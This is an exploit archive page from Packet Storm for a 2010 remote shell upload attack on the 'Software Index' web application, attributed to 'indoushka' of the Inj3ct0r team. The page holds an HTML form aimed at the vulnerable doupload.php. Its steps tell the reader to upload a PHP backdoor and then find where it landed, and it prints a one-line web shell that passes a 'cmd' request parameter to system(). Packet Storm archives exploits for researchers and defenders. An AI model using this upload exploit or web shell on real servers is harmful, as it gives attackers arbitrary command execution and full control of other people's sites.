exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Software Index Remote Shell Upload

Software Index Remote Shell Upload
Posted Jun 17, 2010
Authored by indoushka

Software Index suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 2d0067968f0065e97e6da4b306cc5f1d9643146df438c33c200b85a8d992a88c
Download | Favorite | View

Software Index Remote Shell Upload

Change Mirror Download
======================================================================= 

# Software Index (Remote File Upload) Exploit 

======================================================================= 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 

0     _                   __           __       __                     1 

1   /' \            __  /'__`\        /\ \__  /'__`\                   0 

0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 

1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 

0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 

1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 

0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 

1                  \ \____/ >> Exploit database separated by exploit   0 

0                   \/___/          type (local, remote, DoS, etc.)    1 

1                                                                      1 

0  [+] Site            : Inj3ct0r.com                                  0 

1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1 

0                                                                      0 

1                    ####################################              1 

0                  I'm indoushka member from Inj3ct0r Team             1 

1                    ####################################              0 

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 

  

######################################################################## 

# Vendor: http://www.p30vel.ir/

# Date: 2010-05-27 

# Author : indoushka 

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 

# Contact : indoushka@hotmail.com 

# Home : www.arab-blackhat.co.cc

# Bug  : Up

# Tested on : windows SP2 Français V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                               
# Dork : Copyright 2010. Software Index       
                                                                 
# Exploit By indoushka 

  <html>
<head>
<Title>Select Image File for uploading</Title>

<script language="JavaScript">
function checkFile()
{
if (form1.userfile.value == "")
{
alert(" Please choose a file to upload");
return (false);
}
if (form1.userfile.value.indexOf(".php") == -1 &&form1.userfile.value.indexOf(".png") == -1 &&form1.userfile.value.indexOf(".bmp") == -1 &&form1.userfile.value.indexOf(".jpeg") == -1 && form1.userfile.value.indexOf(".gif") == -1)
{
alert(" Please upload .gif/.jpg/.jpeg/.bmp/.png files only");
form1.userfile.value="";
form1.userfile.focus();
return (false);
}
return(true);
}

</script>


</head>

<body>
<b><font size="3">Upload Image</font>.</b> 
<FORM ENCTYPE="multipart/form-data" ACTION="http://127.0.0.1/Software-Index-P30vel.ir/siteadmin/doupload.php?box=<?php echo $_REQUEST["box"]?>&func=2" METHOD=post ID=form1 NAME=form1 onSubmit="javscript:return checkFile(form1);"> 
<input type="hidden" name="id" value="<?php echo $_SESSION[ "username" ] ?>">
<input type="hidden" name="act" value="upload">
<table><tr><td>
<b><font size="3" color="#FFFFFF"><u><font color="#000000" size="2">Attachment</font></u></font></b> 
        <table>
          <tr> 
            <td valign="top" width="15"><font color="#000000">1.</font></td>
            <td width="470"><font color="#000000">To add an Attachment, click 
              the 'Browse' button to select the file to attach, or type the path 
              to the file in the Text-box below.</font></td>
          </tr>
          <tr> 
            <td valign="top" width="15"><font color="#000000">2.</font></td>
            <td width="470"><font color="#000000">Then click Upload button to 
              complete the upload</font></td>
          </tr>
          <tr> 
            <td valign="top" width="15"><font color="#000000">3.</font></td>
            <td width="470"><font color="#990000">NOTE</font><font color="#000000">: 
              The File transfer can take from a few seconds upto a few minutes 
              depending on the size of the attachment. Please be patient while 
              the attachment is being uploaded.</font></td>
          </tr>
          <tr> 
            <td valign="top" width="15"><font color="#000000">4.</font></td>
            <td width="470"><font color="#990000">NOTE</font><font color="#000000">: 
              The File will be renamed if the file with the same name is present</font></td>
          </tr>
        </table>
      </TD>
    </TR> 
<TR><TD><STRONG>Hit the [Browse] button to find the file on your computer.</STRONG><BR></TD></TR> 
<TR><TD><strong>Image</strong>
<INPUT NAME=userfile SIZE=30 TYPE=file   MaxFileSize="1000000"> 
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
  </TD></TR>
  <TR><TD>&nbsp;</TD></TR>
  <TR><TD><input type="submit" value="Upload" name="uploadfile"></TD></TR>
<TR><TD>NOTE: Please be patient, you will not receive any notification until the 
file is completely transferred.<BR><BR></TD></TR>
</table>

</FORM>

   
<!--
<Script Language="JavaScript">
function listattach(filename)
{
window.opener.document.form123.<?php //request.QueryString("box") ?>.value=filename
window.close()
}
</script>
<Input type=button value=Done onClick="listattach('<?php //echo filename ?>')">
-->

</body>

</html>

1 - Save as php or html and upload to your localhost or server 

2 - use Backdoor 

<?php
$cmd = $_GET['cmd'];
system($cmd);
?>

3 - you see where the file uploaded

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ
---------------------------------------------------------------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close